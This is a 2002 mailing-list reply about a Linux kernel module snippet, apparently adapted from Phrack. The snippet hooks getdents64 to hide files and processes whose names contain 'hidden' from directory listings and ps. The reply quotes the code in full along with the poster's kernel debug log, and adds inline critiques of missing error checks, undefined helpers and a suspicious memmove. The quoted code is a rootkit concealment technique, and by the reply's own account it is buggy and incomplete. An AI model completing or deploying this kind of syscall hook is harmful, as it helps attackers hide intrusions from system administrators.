On Thu, Aug 29, 2002 at 02:57:46PM +0300, Guy Cohen wrote: > Here's a little modify (just a bit) snipplet from phreak about > how to hide files and process. Canany one answer me why > does it exit after it finds the first hidden process, and don't go > on to hide the second hidden porcess?
Nope, you provided incomplete and buggy code. Please post the entire
snippet if you want meaningful comments.
Comments inline.
> Thanks,
>
> Guy
>
> <+++>
> char hidden[] = "hidden";
> [...]
> int n_getdents64(unsigned int fd, struct dirent64 *dirp, unsigned int count)
> {
> unsigned int tmp, n;
> int t, proc=0;
> struct inode *dinode;
> struct dirent64 *dirp2, *dirp3;
>
> tmp = (*orig_getdents64) (fd, dirp, count);
>
> dinode = current->files->fd[fd]->f_dentry->d_inode;
>
> if( dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) &&
> MINOR(dinode->i_dev) == 2)
> proc = 1;
>
> /*dinode is the inode of the required directory*/
> if (tmp > 0)
> {
> /*dirp2 is a new dirent structure*/
> dirp2 = (struct dirent64 *) kmalloc(tmp, GFP_KERNEL);
BAD MISTAKE, no checking for malloc failure.
> /*copy original dirent structure to dirp2*/
> copy_from_user(dirp2, dirp, tmp);
And no checkinf for copy_form_user failing.
> /*dirp3 points to dirp2*/
> dirp3 = dirp2;
>
> t = tmp;
>
> while (t > 0)
> {
> n = dirp3->d_reclen;
> t -= n;
>
> /*check if current filename is the name of the file we want to hide*/
> /* or pid */
> if ( (strstr((char *) &(dirp3->d_name), (char *) &hidden) != NULL) ||
> (proc && invisible(myatoi(dirp3->d_name))))
where is invisible defined? myatoi?
> {
> /*modify dirent struct if necessary*/
> if (t != 0)
> memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
this looks... suspicious.
> else
> dirp3->d_off = 1024;
> tmp -= n;
> }
>
> if (t != 0)
> dirp3 = (struct dirent64 *) ((char *) dirp3 + dirp3->d_reclen);
>
> }
>
> copy_to_user(dirp, dirp2, tmp);
Need to check here as well.
> kfree(dirp2);
> }
> return tmp;
> }
>
> <--->
>
> If you want to see a little KERN_DEBUG:
There's not a signle printk in the snippet above. Where is this log
from?
> ps was run after
> /hiddensleep &
> /hiddensleep2 &
>
> [...]
> Aug 29 14:40:22 arpo kernel: IS IT?: hiddensleep
> Aug 29 14:40:22 arpo kernel: GOT IT, IT'S: hiddensleep
> Aug 29 14:40:22 arpo kernel: tmp = 456, t = 48, n = 24
> Aug 29 14:40:22 arpo kernel: IS IT?: ps
> Aug 29 14:40:22 arpo kernel: IS IT?: ps
> Aug 29 14:40:22 arpo kernel: IS IT?: less
> Aug 29 14:40:22 arpo kernel: +++
> Aug 29 14:40:22 arpo kernel: dinode->i_ino(1) == 1
> Aug 29 14:40:22 arpo kernel: !MAJOR(dinode->i_dev) == 1
> Aug 29 14:40:23 arpo kernel: MINOR(dinode->i_dev) == 2
> Aug 29 14:40:23 arpo kernel: tmp = 0
> [end]
>
>
> BTW: I know some of you prolly wrote a better module that does this
> and even more.. I'm not interesting in getting its source (it's just too easy),
> I want to keep working on mine.
Sure, but do it right...
msg21410/pgp00000.pgp
Description: PGP signature
